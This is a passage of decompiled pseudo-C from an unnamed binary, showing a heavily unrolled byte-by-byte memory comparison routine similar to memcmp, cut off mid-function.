													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L528;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L527;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M0024F66A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L528;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L528;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L528;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
